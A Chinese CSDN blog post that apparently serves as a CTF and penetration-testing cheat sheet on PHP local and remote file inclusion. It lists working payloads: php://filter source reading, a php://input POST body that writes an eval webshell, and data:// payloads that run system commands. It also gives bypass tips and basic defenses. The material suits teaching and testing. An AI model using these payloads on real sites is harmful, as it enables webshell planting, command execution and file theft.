文件包含

最新推荐文章于 2022-08-17 13:30:34 发布
最新推荐文章于 2022-08-17 13:30:34 发布
阅读量319 收藏 1
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a965527596/article/details/107707005
版权

文件包含

1.原理

在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的检验,从而使攻击者操作了预想之外的文件

2.危害

可能会导致包含webshell,文件读取,命令执行等

3.判断和可能出现位置

a.判断

读取一个本地的文件看是否能去读取成功

b.可能出现位置

在file=参数,或者一个参数后跟着是文件名都可以试试

4.基础利用

- 直接包含webshell

?file=shell.jpg //可以用菜刀直接连接这个地址

- 利用php://filter/read协议

?filename=php://filter/read=convert.base64-encode/resource=1.php //读源码

- 利用php://input协议

?filename=php://input
post:<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>’);?>
post:<?php system('ls');?> //命令执行

- 利用file://协议

?file=file://flag.php //读取文件

- 利用data://text/plain协议

?file=data://text/plain,<?php system("cat flag.php")?> //执行命令
?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=

5.bypass

a.直接读取不成功,考虑目录穿越,绕过目录穿越的waf
b.尝试远程文件包含,包含远程服务器上的文件连接或者写入webshell。

6.防御

关闭allow_url_include选项防止远程文件包含
关闭allow_url_fopen
对file的参数进行严格限制,使用白名单的方式

7.扩展

1)php文件包含相关函数

  • include()
  • include_once()
  • require()
  • require_once()
  • fopen()
  • readfile()

2)JSP文件包含相关函数

  • java.io.File()
  • java.io.FileReader()

3)ASP文件包含相关函数

  • include file
  • include virtual
说白道黑
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pte 文件包含
weixin_51387754的博客
10-13 1061
注册信息安全专业人员-渗透测试,英文为 Certified Information Security Professional - Penetration Test Engineer ,简称 CISP-PTE。证书持有人员主要从事信息安全技术领域网站渗透测试工作,具有规划测试方案、编写项目测试计划、编写测试用例、测试报告的基本知识和能力。
LFIboomCTF:本地文件包含突破实践原始码以及相应协议利用指南
03-23
实际上:文件包含漏洞是“代码注入”的一种,包含即执行,可干的坏事可想而知,看i春秋总结的危害有如下几种: PHP包含突破性合并上传漏洞; PHP包含读文件; PHP包含写文件; PHP包含日志文件; PHP截断包含;...
php伪协议实现命令执行,任意文件读取
qq_44418229的博客
06-09 6211
ctf----php伪协议
php运算符= %3c%3c%3c,PHP命令&代码&执行&绕过
weixin_36088083的博客
03-27 540
一、命令执行/写shellevalfputs1fputs(fopen('t.php','w'),'')preg_replace ====mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )5.6以下可以执行5.6以上仍然...
Web安全-文件包含漏洞
m0_37786014的博客
11-29 242
1. 什么是文件包含漏洞 开发人员通常会把重复可用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般称为包含。攻击者利用这种包含的特性,加上应用本身对文件控制不严,对include进来的文件不可控,最终造成了攻击者进行恶意文件包含。 2. 引发文件包含漏洞的4个参数 1、include() 当使用该函数包含文件时,只有代码执行到 include() 函数...
文件包含&PHP伪协议利用
技术超强的网络安全平台
11-20 5248
文件包含&PHP伪协议利用 相关函数 要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件: 1、Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件; 2、用户能够控制该动态变量。 php中引发文件包含漏洞的通常是以下四个函数: (1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本,如果在包含的过程中有错,比如文件不存在等,则会直接退出,不执行后续语句。; (2) Require_once:与 include 类
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
markdown-include:使用C样式语法将markdown文件包含到其他markdown文件中
02-04
markdown-include是使用Node.js构建的,它允许您使用C风格的include语法将markdown文件包含到其他markdown文件中。 编译降价文件 markdown-include的主要功能是它允许您将markdown文件包含到其他markdown文件中。 ...
python 拷贝文件 包含子文件夹及文件
01-25
python 拷贝文件 包含子文件夹及文件
提取并显示文件包含的图标
06-11
总的来说,提取并显示文件包含的图标是软件开发中的一个基本操作,它涉及到操作系统API调用、图像处理和用户界面设计等多个方面。通过学习和实践这一技能,开发者能够更好地自定义和优化他们的应用程序,提供更具...
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计
09-26
文件包含、命令执行漏洞、代码执行漏洞、基础代码审计 文件包含漏洞是指在开发过程中,开发人员将可重复使用的函数写入单个文件中,并在需要时调用该文件,而不是重新编写代码。这种调用文件的过程称为包含。文件...
Spring Boot配置文件包括示例
02-21
Spring Boot配置文件包括示例 Java 1.8.0 Gradle6.0.1 Spring Boot 2.2.2 模组 共享的: application-shared.yml app:在application.yml包含application-shared.yml
Win32MemHelpers:简单的.h文件包含用于清除Win32平台上的备用列表的功能
05-13
Win32MemHelpers 简单的.h文件包含用于在Win32平台上使用内存和文件缓存进行操作的功能ClearStandbyList-删除文件缓存ClearLowPriorityStandbyList-待定ClearWorkingSets-待定FlushModifiedList-TBD
快速检索文件关键字检查涉密文件
04-19
这项技术的核心在于关键字搜索,通过对大量文件内容进行扫描,匹配预设的关键字列表,从而找出可能包含机密数据的文档。这种技术对于保护信息安全,防止敏感信息泄露至关重要。 标签 "检测秘密文件" 暗示了这个系统...
Emacs配置文件
11-19
配置文件是Emacs的核心特点之一,它允许用户根据个人需求定制编辑环境,包括快捷键绑定、界面设置、自动补全规则、语言特定的模式等。这个"Emacs配置文件"就是对Emacs进行个性化调整的脚本,通常以`.emacs`或`init....
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
复现文件上传四次绕过
金色%夕阳的博客
08-16 268
先上传文件,在建一个上传文件的目录upload,在解压文件,解压完文件后在对解压完的文件进行判断,判断文件里面是不是有除了zip、jpg、gif、png之外的文件,有的话就直接删除。从第二版的代码可以看出,对目录中的所有次级目录进行了递归删除,但是它还是先解压压缩包到本地再进行删除,所以,可以利用这个时间竞争型漏洞来绕过,只要能在被删除之前访问到一次php文件,就能够成功在它不会进行检查和删除的上级目录中生成一个新的php文件。1、存在时间竞争型漏洞:若上传的是php文件,是先被解压,再被删除。......
文件包含知识总结
qq_42570883的博客
01-08 1528
0×01 文件包含 Q:什么是文件包含? A:简单一句话,为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来, 直接使用包含文件的代码。 Q:文件包含漏洞的成因是什么? A:在包含文件的时候,为了灵活包含文件,将包含文件设置为变量,通过动态变量来引入需要包含的文件时, 用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞, 通常文件包含漏洞出现在PHP语言中。 文件包含漏洞的形成,简单来说,需要满足两个条件: 1、用户能够控制这
文件包含技术-常见文件包含
最新发布
01-24
"本文主要探讨了文件包含技术,特别是针对网络安全方面常见的文件包含路径,包括Linux和Windows系统下的示例。文件包含漏洞是网络安全中的一个重要问题,它允许攻击者通过恶意利用来执行任意代码或者获取敏感信息。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值